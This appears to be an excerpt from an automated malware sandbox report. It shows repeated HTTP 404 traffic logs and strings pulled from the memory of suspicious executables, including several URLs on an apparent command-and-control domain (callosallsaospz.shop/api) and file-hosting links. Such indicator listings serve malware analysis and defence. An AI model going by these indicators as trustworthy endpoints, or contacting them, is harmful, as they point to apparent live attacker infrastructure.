Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 28 5b 33 08 a5 6f 58 b5 a9 16 a7 d0 b0 fb 70 db 2c c0 f1 2f 5e 5b 89 92 8a Data Ascii: #\([3oXp,/^[
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:31:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:32:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:32:21 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:32:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:32:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:32:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:33:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: 7C81.exe, 0000000A.00000002.2959614656.00007FF7D50A3000.00000008.00000001.01000000.00000007.sdmp, 7C81.exe, 0000000A.00000000.2860149231.00007FF7D5094000.00000008.00000001.01000000.00000007.sdmp, 7C81.exe.2.dr String found in binary or memory: http://.css
Source: 7C81.exe, 0000000A.00000002.2959614656.00007FF7D50A3000.00000008.00000001.01000000.00000007.sdmp, 7C81.exe, 0000000A.00000000.2860149231.00007FF7D5094000.00000008.00000001.01000000.00000007.sdmp, 7C81.exe.2.dr String found in binary or memory: http://.jpg
Source: BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2081714361.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: 6E8A.exe.2.dr String found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
Source: 6E8A.exe.2.dr String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
Source: BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: explorer.exe, 00000002.00000000.2078086633.0000000000F13000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.v
Source: BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2081714361.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2081714361.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: 6E8A.exe.2.dr String found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
Source: 6E8A.exe.2.dr String found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
Source: 6E8A.exe.2.dr String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
Source: 6E8A.exe.2.dr String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
Source: BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 7C81.exe, 0000000A.00000002.2959614656.00007FF7D50A3000.00000008.00000001.01000000.00000007.sdmp, 7C81.exe, 0000000A.00000000.2860149231.00007FF7D5094000.00000008.00000001.01000000.00000007.sdmp, 7C81.exe.2.dr String found in binary or memory: http://html4/loose.dtd
Source: powershell.exe, 0000000F.00000002.4506439051.0000022A4534E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.4477339135.0000022A36B30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.4506439051.0000022A4520C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2081714361.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000002.00000000.2081714361.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: 6E8A.exe.2.dr String found in binary or memory: http://ocsps.ssl.com0
Source: 6E8A.exe.2.dr String found in binary or memory: http://ocsps.ssl.com0?
Source: 6E8A.exe.2.dr String found in binary or memory: http://ocsps.ssl.com0_
Source: powershell.exe, 0000000F.00000002.4477339135.0000022A353D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: 6E8A.exe, 0000000B.00000002.4476671505.0000021F87C33000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://rentry.co
Source: explorer.exe, 00000002.00000000.2080799819.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2081253102.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2081273713.0000000008890000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: 6E8A.exe, 0000000B.00000002.4476671505.0000021F87821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.4477339135.0000022A351A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000F.00000002.4477339135.0000022A36808000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.4477339135.0000022A3693F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://store4.gofile.io
Source: powershell.exe, 0000000F.00000002.4477339135.0000022A353D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000002.00000000.2085955197.000000000C81C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: 3530.exe, 3530.exe.2.dr String found in binary or memory: http://www.oberhumer.com
Source: 6E8A.exe.2.dr String found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
Source: 6E8A.exe.2.dr String found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
Source: BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: explorer.exe, 00000002.00000000.2083945040.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: powershell.exe, 0000000F.00000002.4477339135.0000022A351A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: explorer.exe, 00000002.00000000.2080080282.00000000076F8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000002.00000000.2081714361.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000002.00000000.2080080282.0000000007637000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000002.00000000.2079158771.00000000035FA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.coml
Source: BitLockerToGo.exe, 0000000E.00000003.3023337525.000000000082F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: BitLockerToGo.exe, 0000000E.00000003.3035559758.000000000082E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: BitLockerToGo.exe, 0000000E.00000003.3018648864.0000000000830000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3073235236.0000000000841000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000002.3107914104.0000000000841000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3055864106.0000000000844000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3023337525.000000000082F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3035559758.0000000000830000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3018166351.000000000082F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/
Source: BitLockerToGo.exe, 0000000E.00000003.3018136549.000000000084D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3035559758.0000000000830000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3000915062.000000000084C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3044151506.000000000084F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3055424185.000000000084E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3035776586.000000000084D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop///
Source: BitLockerToGo.exe, 0000000E.00000002.3107914104.0000000000841000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/0
Source: BitLockerToGo.exe, 0000000E.00000003.3073235236.0000000000841000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000002.3107914104.0000000000841000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/D
Source: BitLockerToGo.exe, 0000000E.00000003.3018166351.000000000082F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3104687148.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000002.3107867332.0000000000831000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/api
Source: BitLockerToGo.exe, 0000000E.00000003.3055164389.0000000000836000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/apiQbd
Source: BitLockerToGo.exe, 0000000E.00000003.3104687148.000000000082F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000002.3107867332.0000000000831000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/apicnmamaa
Source: BitLockerToGo.exe, 0000000E.00000003.3104687148.000000000082F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000002.3107867332.0000000000831000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/apiem
Source: BitLockerToGo.exe, 0000000E.00000003.3035559758.0000000000830000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/apioro
Source: BitLockerToGo.exe, 0000000E.00000002.3107588566.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3104687148.00000000007D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/apisF
Source: BitLockerToGo.exe, 0000000E.00000003.3073235236.0000000000841000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000002.3107914104.0000000000841000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/apiyy
Source: BitLockerToGo.exe, 0000000E.00000003.2999741384.000000000084C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/b
Source: BitLockerToGo.exe, 0000000E.00000003.3055864106.0000000000844000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3042842464.0000000000833000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3044923800.0000000000844000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3042953419.000000000083A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3035559758.0000000000830000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3043989545.000000000083E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/bO
Source: BitLockerToGo.exe, 0000000E.00000003.3073235236.0000000000841000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000002.3107914104.0000000000841000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3055864106.0000000000844000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3042842464.0000000000833000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3044923800.0000000000844000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3042953419.000000000083A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3035559758.0000000000830000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3043989545.000000000083E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/e
Source: BitLockerToGo.exe, 0000000E.00000002.3107914104.0000000000841000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/h
Source: BitLockerToGo.exe, 0000000E.00000003.3054586078.000000000088E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3043948078.000000000088E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3035350826.000000000088D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3033291199.000000000088D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/i
Source: BitLockerToGo.exe, 0000000E.00000003.3073235236.0000000000841000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000002.3107914104.0000000000841000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/m
Source: BitLockerToGo.exe, 0000000E.00000003.2966295080.00000000007FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://callosallsaospz.shop/o
Source: BitLockerToGo.exe, 0000000E.00000003.3035559758.000000000082E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: BitLockerToGo.exe, 0000000E.00000003.3023337525.000000000082F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: powershell.exe, 0000000F.00000002.4506439051.0000022A4520C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000F.00000002.4506439051.0000022A4520C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000F.00000002.4506439051.0000022A4520C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: BitLockerToGo.exe, 0000000E.00000003.2984214183.0000000004AC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BitLockerToGo.exe, 0000000E.00000003.2984214183.0000000004AC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BitLockerToGo.exe, 0000000E.00000003.2984214183.0000000004AC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
